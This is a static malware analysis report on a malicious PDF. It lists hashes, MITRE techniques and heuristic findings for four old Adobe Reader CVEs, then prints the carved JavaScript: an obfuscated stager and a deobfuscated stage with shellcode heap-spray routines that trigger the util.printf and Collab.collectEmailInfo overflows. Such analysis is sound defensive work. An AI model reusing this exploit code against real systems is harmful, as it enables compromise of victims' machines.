Malicious PDF — malware analysis report

Static analysis result for SHA-256 72843e38b6cb9f98…

MALICIOUS

PDF

15.7 KB
MD5: ae1c8137a7e385d8698ac9404cfb83eb SHA-1: 19ec550812ca094c8a28c1db28d759e184b8d4e5 SHA-256: 72843e38b6cb9f98722cb247dbde645aa416d7c1ea5d4ab49fbd3064c46bc826
616 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the exploit cluster and dispatcher heuristics. The specific payload and its ultimate target are not discernible from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 12

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.Agent-36086 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Large comment-padded JavaScript eval stager high PDF_JS_LARGE_COMMENT_PADDED_EVAL
    PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js
9a4d661b3e27635dd8a48f396b7827a52499204ce03afaa9a2ebca68fd2196ef		 pdf-javascript-stream PDF /JS object 6 at offset 0x143 425894 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function Ba(Xa){ /*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
... (truncated)
legacy_pdfkit_stage_000.js
edc19b87ffb7dd6fb1d386d4c6c72bc4495600a00492987dec74770256409b30		 deobfuscated-js comment-padded substitution-hex decoded JavaScript at offset 0x143 10413 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len)
{
	while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
	var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u32FF%uF7FC%u5608%uC75D%u3208%u7CFC%u3E48%u8777%u9F14%u8777%uB300%uF738%uCDFF%u7C03%u89E4%uF7B4%u3208%uF796%uBC60%uF9B2%u5AE4%u0964%u3C82%u1894%uD2C6%u9F9C%uF83B%uAC76%u0A60%u5BDE%u5AEF%uBE16%uDA82%u2C94%u1182%u9F15%u7E53%u2AE6%uDE60%uF46B%uDA04%uF6E3%u3208%uF375%uB123%uF317%uF203%u0689%u5C60%u8399%u5A08%u9E8B%u5B66%u08A8%u1A5D%uAEA5%uF203%u73F3%u32F0%uF7FC%uC283%uAF47%u3208%u9DFC%u5A08%uB3D5%u65E0%uBE94%u3DE5%u9F82%u7983%uA81F%uD2E0%uF7FC%uBB08%uDCF8%uD98B%uFCF8%u47C8%u7A0D%u328D%uF7FE%u6208%u0894%u3208%u08FC%u065D%u7271%u3608%uF7FC%u5858%u9DFC%uBF08%uF779%u320A%uA7FC%u67F7%u7AC4%u32BD%uF7F8%u9E08%u37F6%uC97D%u30B2%u1C0E%u8F99%uF56D%uF3BA%u3208%uF7FC%uB785%uF3FC%u3208%u3ECF%u6259%uA203%u7234%u73F3%u3288%uF7FC%uBB40%uBBB9%u3260%uF7BC%u5808%u08BC%u7A5D%u37F7%u5C7C%uB275%u5868%u9DFC%u5808%u9DFC%u5808%u08FC%u625D%u37F7%u687C%uF796%u3260%uF7FC%u580C%u9DFC%uDB08%uF756%u3208%u08AC%u665D%u37F7%u707C%uB275%uBF60%u93B9%u5A58%uB7FC%u3208%u8203%uCD68%u9F89%u67F7%uFCA4%u46C8%u7CE9%u564D%u37F7%u3C7C%u8203%uCD6C%u9789%u47F7%u08B0%u725D%u2217%u47F7%u08B0%u765D%u3ED7%u6349%u7271%u3608%uF7FC%uCD58%uDBA9%uCD62%uA203%u6738%u1B77%u4F83%uFCF4%u46F7%uA4B7%uEC83%u7CAA%u0E7B%u8377%u4A3B%u04FF%uB95E%uD78A%uC10B%u3ECF%u7341%uF451%u64CB%u01CF%u8C07%uCFEC%u46DE%u36F4%u3FC6%u05FF%uD948%uCC0D%u6CF6%u1289%uB952%u7C17%u1652%u2AFF%uB96E%uBCF0%u6883%uF4E0%uB9D5%u7CF8%uF70B%uACA2%u30E3%u37CF%uF055%uF7F8%u63E0%u0803%u5AF7%u8388%u0878%uD8D3%u4169%u9695%u4266%u8593%u4666%u9E8E%u1C78%u989F%u1D65%u8588%u5669%uD899%u5137%uC6C1%u412E%u9395%u0635%u94CD%u043E%u95CE%u503C%u929D%u0539%uC7CE%u0B31%uC59F%u5431%u92C8%u073E%uCFC5%u576B%u9298%u143B%uCA8F%u323B%uF7FC%u0008");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;
	while(bigblock.length<spray){bigblock+=bigblock;}
	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);
	while(block.length+spray<0x40000){block=block+block+fillblock;}
	var mem_array=new Array();
	for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}
	
function collab_email()
{
	var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u32FF%uF7FC%u5608%uC75D%u3208%u7CFC%u3E48%u8777%u9F14%u8777%uB300%uF738%uCDFF%u7C03%u89E4%uF7B4%u3208%uF796%uBC60%uF9B2%u5AE4%u0964%u3C82%u1894%uD2C6%u9F9C%uF83B%uAC76%u0A60%u5BDE%u5AEF%uBE16%uDA82%u2C94%u1182%u9F15%u7E53%u2AE6%uDE60%uF46B%uDA04%uF6E3%u3208%uF375%uB123%uF317%uF203%u0689%u5C60%u8399%u5A08%u9E8B%u5B66%u08A8%u1A5D%uAEA5%uF203%u73F3%u32F0%uF7FC%uC283%uAF47%u3208%u9DFC%u5A08%uB3D5%u65E0%uBE94%u3DE5%u9F82%u7983%uA81F%uD2E0%uF7FC%uBB08%uDCF8%uD98B%uFCF8%u47C8%u7A0D%u328D%uF7FE%u6208%u0894%u3208%u08FC%u065D%u7271%u3608%uF7FC%u5858%u9DFC%uBF08%uF779%u320A%uA7FC%u67F7%u7AC4%u32BD%uF7F8%u9E08%u37F6%uC97D%u30B2%u1C0E%u8F99%uF56D%uF3BA%u3208%uF7FC%uB785%uF3FC%u3208%u3ECF%u6259%uA203%u7234%u73F3%u3288%uF7FC%uBB40%uBBB9%u3260%uF7BC%u5808%u08BC%u7A5D%u37F7%u5C7C%uB275%u5868%u9DFC%u5808%u9DFC%u5808%u08FC%u625D%u37F7%u687C%uF796%u3260%uF7FC%u580C%u9DFC%uDB08%uF756%u3208%u08AC%u665D%u37F7%u707C%uB275%uBF60%u93B9%u5A58%uB7FC%u3208%u8203%uCD68%u9F89%u67F7%uFCA4%u46C8%u7CE9%u564D%u37F7%u3C7C%u8203%uCD6C%u9789%u47F7%u08B0%u725D%u2217%u47F7%u08B0%u765D%u3ED7%u6349%u7271%u3608%uF7FC%uCD58%uDBA9%uCD62%uA203%u6738%u1B77%u4F83%uFCF4%u46F7
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.